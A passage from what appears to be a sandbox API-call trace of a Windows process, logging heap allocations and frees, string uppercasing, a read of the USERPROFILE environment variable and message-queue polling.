Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0211.775] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa750 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.775] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0211.775] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0211.775] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0211.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0211.776] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0211.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.777] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.777] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0211.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0211.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.778] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa798 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0211.778] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0211.778] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0211.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0211.778] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0211.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0211.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a28 [0211.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0211.779] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.779] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a38 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0211.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0211.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.780] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.780] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0211.781] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0211.781] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0211.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0211.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0211.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0211.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0211.781] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0211.781] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.781] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0211.782] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0211.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0211.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0211.782] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0211.782] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0211.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.783] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0211.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0211.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0211.783] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0211.783] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0211.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0211.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.784] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0211.784] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0211.784] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0211.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0211.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.785] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0211.785] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.785] 